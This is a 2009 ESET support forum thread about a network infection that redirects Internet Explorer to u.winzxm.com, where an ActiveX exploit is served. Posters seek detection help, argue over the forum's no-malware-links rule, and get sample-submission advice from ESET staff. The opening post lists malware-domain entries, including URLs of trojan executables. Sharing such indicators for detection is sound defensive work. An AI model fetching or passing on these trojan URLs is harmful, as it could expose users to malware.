Undetected by Eset u.winzxm.com

Discussion in 'ESET NOD32 Antivirus' started by Denny Lasaath, Apr 11, 2009.

Thread Status:
Not open for further replies.
  1. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Compromised a whole network of computers. Have latest version of Eset 4.0.417. Full scan no infection. It is currently being detected by One Care when the browser trys to access the site..

    When trying to connect to Windows Update, it connects to u.winzxm.com and trys to install an activex. After trying to install activex, it hangs IE.
    Host files are clean, DNS is clean. Input Microsoft Windows Update IP manually on browser, still same results.

    Please see attach pic's of the site it connects to.

    http://mtgrescue.com/1.JPG
    http://mtgrescue.com/2.JPG
    http://mtgrescue.com/3.JPG
    http://mtgrescue.com/4.JPG
    http://mtgrescue.com/activex.JPG
    http://mtgrescue.com/onecare.JPG
    http://mtgrescue.com/onecare1.JPG

    Scan Logs
    http://mtgrescue.com/SysInspector-DDZ1Y5H1-090411-1014.zip
    http://mtgrescue.com/4102009.xml

    Info from Malware domain list.
    http://www.malwaredomainlist.com/mdl.php?search=61.152.144.85&colsearch=All&quantity=50

    2009/04/08_00:00 j.winxyz.com/win/j/index.htm 61.152.144.85 - exploits zengcheng kirazxm@qq.com
    2009/04/08_00:00 m.winxyz.com 61.152.144.85 - redirects to exploits zengcheng kirazxm@qq.com
    2009/01/21_12:00 u.winzxm.com 61.152.144.85 - exploits winzxm@qq.com
    2009/04/08_00:00 winxyz.com/win/j.exe 61.152.144.85 - trojan zengcheng kirazxm@qq.com
    2009/04/08_00:00 winzxm.com/win/u.exe 61.152.144.85 - trojan zengcheng winzxm@qq.com
     
    Last edited: Apr 11, 2009
  2. dorgane

    dorgane Registered Member

    Joined:
    Oct 17, 2007
    Posts:
    362
    Last edited: Apr 11, 2009
  3. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Not sure what steps to take, it pretty much hangs IE. Does not effect Firefox.
     
  4. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    you should not post links to malware here, please edit your post
     
    Last edited: Apr 11, 2009
  5. funkydude

    funkydude Registered Member

    Joined:
    Apr 5, 2004
    Posts:
    6,852
    I like how you say that yet you quoted the link :D
     
  6. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    and edited it about 60 secs afterwards :rolleyes:
     
  7. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    Please edit/remove link to Virustotal as this is also a violation of TOS.
    Thanks.
     
  8. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    shouldn't you also be asking the person who actually posted these links? :mad:
     
  9. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    The original link was removed by moderator. You then quoted the links, thereby
    copying them.
     
  10. dannyboy

    dannyboy Registered Member

    Joined:
    Jul 21, 2005
    Posts:
    113
    Location:
    UK
    the user him/herself removed them, but only in the last couple of minutes. Yes I understand how quoting works thanks.
     
  11. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,731
    Location:
    New York City
    Actually, the moderator removed the link to Virustotal, after I alerted him/her.
     
  12. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Any suggestion for Eset to help??
     
  13. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
  14. nanana1

    nanana1 Frequent Poster

    Joined:
    Jun 22, 2007
    Posts:
    947
    On Sunday ?:p
     
  15. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    You would be concern if your clients are at risk by this. Imagine your network was infected by this ;) Asking for help because we want Eset to be the first to detect it. :thumb:
     
  16. bradtech

    bradtech Guest

    submit some samples to ESET or call them directly.. It usually takes 3 days before I hear back if I email or leave messages
     
  17. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Not sure what to submit, Eset is not finding anything nor we know what file is causing it. When trying to visit any of Microsoft websites, it directs to itself to u.winzxm.com. Currently Windows One Care detects it when it is trying to download from u.winzxm.com. Temp fix is to block access to winzxm.com on our firewall. We have contacted Eset on Fri, they called back but we have to wait until Monday for help.
     
  18. GAN

    GAN Registered Member

    Joined:
    Mar 3, 2007
    Posts:
    355
    Just submit the URL and the information you already got that could help Eset to understand and fix this issue.
     
  19. GrammatonCleric

    GrammatonCleric Registered Member

    Joined:
    Jan 8, 2009
    Posts:
    372

    wait, are you actually expecting for ESET to respond to any Emergency on a Weekend? Any Weekendo_O and ESPECIALLY EASTER SUNDAYo_O??:eek: :eek: :eek:
    ~Comment removed.~

    FYI, Monday after Easter Sunday is also national Holiday in some Eastern European Countries.....just an FYI. (Most kids are running around dumping buckets of water on each other).

    Get in contact with the CA support, directly.
     
    Last edited by a moderator: Apr 13, 2009
  20. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    I'd suggest sending all files marked red in the SysInspector log in an archive protected with the password "infected" to samples[at]eset.com with this thread's url in the subject.
     
  21. sir_carew

    sir_carew Registered Member

    Joined:
    Sep 2, 2003
    Posts:
    884
    Location:
    Santiago, Chile
    Hi,
    The link you posted with malware are now detected by NOD32 as u.exe - Win32/PSW.Gamania.NBN trojan and E:\index.htm - JS/TrojanDownloader.Iframe.NDY trojan.

     
  22. Denny Lasaath

    Denny Lasaath Registered Member

    Joined:
    Sep 9, 2006
    Posts:
    14
    Looks like that is today's definitions, hopefully it finds something.
     
  23. SteveFromPB

    SteveFromPB Registered Member

    Joined:
    Apr 16, 2009
    Posts:
    1
    Location:
    San Diego, CA
    Denny -

    any luck on this? I'm having the same problem on my small office network, every client has some Javascript installed (js_shellcode.br) that forces Internet Explorer to try to download a file (expl_iframebo.a) from u.winzxm.com. My antivirus is TrendMicro, and it's blocking the download of the exploit object, but I can't seem to remove the Javascript. It tries to run in Firefox/Chrome/Safari as well but doesn't seem to work. Unfortunately, a good deal of the modern world doesn't deem it necessary to make their sites compatible with anything but IE.

    If you've found anything in your searching, please let me know.
     
  24. GAN

    GAN Registered Member

    Joined:
    Mar 3, 2007
    Posts:
    355
    This is the support forum for Eset products so in your case you should check out a support forum for Trend products if Trend is not able to detect or remove a infection. Unless you use Eset nod32 i don't think this is the right place to ask why your antivirus software do not block/remove a infection. The solution provided here will most likely be of no help for you since you do not use a antivirus product from Eset.
     
  25. dshelton

    dshelton Registered Member

    Joined:
    May 11, 2009
    Posts:
    1
    Does Eset solve this problem now? I ran the trial nod32 on 4/21/09 and so far no such luck.
     
Thread Status:
Not open for further replies.